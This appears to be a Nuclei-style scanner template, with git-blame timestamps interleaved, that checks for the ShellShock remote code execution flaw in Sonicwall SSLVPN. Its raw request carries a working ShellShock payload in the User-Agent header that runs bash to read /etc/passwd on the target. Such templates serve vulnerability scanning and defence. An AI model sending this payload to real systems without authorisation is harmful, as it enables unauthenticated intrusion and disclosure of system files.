2021-01-26 10:20:46 +00:00
id : sonicwall-sslvpn-shellshock
info :
name : Sonicwall SSLVPN ShellShock RCE
author : PR3R00T
severity : critical
2021-10-26 12:28:43 +00:00
description : A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://twitter.com/chybeta/status/1353974652540882944
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
2021-02-12 05:53:01 +00:00
tags : shellshock,sonicwall,rce,vpn
2021-01-26 10:20:46 +00:00
requests :
2021-01-26 10:40:48 +00:00
- raw :
2021-01-26 10:44:17 +00:00
- |
2021-01-26 10:20:46 +00:00
GET /cgi-bin/jarrewrite.sh HTTP/1.1
Host : {{Hostname}}
User-Agent : "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'"
Accept : */*
2021-01-26 14:31:01 +00:00
matchers-condition : and
matchers :
2021-01-26 10:20:46 +00:00
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-01-26 10:20:46 +00:00
part : body
- type : status
status :
2021-01-26 14:31:01 +00:00
- 200